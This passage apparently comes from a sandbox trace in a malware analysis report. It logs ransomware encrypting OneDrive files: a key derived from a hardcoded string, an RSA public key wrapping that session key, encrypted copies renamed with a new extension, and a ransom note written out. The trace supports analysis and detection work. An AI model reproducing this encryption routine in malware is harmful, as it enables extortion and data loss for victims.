lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.206] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.206] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.206] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.207] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.207] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.207] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.207] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.207] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.207] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0281.207] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0281.207] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0281.207] CloseHandle (hObject=0x5d4c) returned 1 [0281.207] CloseHandle (hObject=0x5d68) returned 1 [0281.209] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.215] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.216] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.218] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.220] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0281.220] CryptDestroyKey (hKey=0x2fc408) returned 1 [0281.220] CryptReleaseContext (hProv=0x2f1e910, dwFlags=0x0) returned 1 [0281.220] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.220] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0281.220] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\readme_back_files.htm")) returned 0xffffffff [0281.220] AreFileApisANSI () returned 1 [0281.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0281.220] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ml-in\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ml-in\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.222] GetFileType (hFile=0x5d3c) returned 0x1 [0281.222] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.223] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.223] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0281.223] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.223] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.223] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.224] GetLastError () returned 0x0 [0281.224] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.224] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.224] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d68 [0281.225] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.266] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.267] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1ebb8) returned 1 [0281.269] CryptCreateHash (in: hProv=0x2f1ebb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.269] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0281.269] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.269] CryptDeriveKey (in: hProv=0x2f1ebb8, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc208) returned 1 [0281.270] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.270] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.270] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1eff8) returned 1 [0281.270] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1eff8, dwCertEncodingType=0x1, pInfo=0x2f378b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f378e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f378e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc7c8) returned 1 [0281.270] CryptEncrypt (in: hKey=0x2fc7c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.270] CryptEncrypt (in: hKey=0x2fc7c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e6f0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e6f0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.270] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f1e6f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e6f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.271] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.273] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.273] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.287] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.287] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.288] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.288] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.288] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.288] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.288] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.288] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.288] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.288] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.289] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.289] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.289] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.289] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.289] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.290] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.290] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.290] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.290] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.290] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.291] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.291] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.291] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.291] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] ReadFile 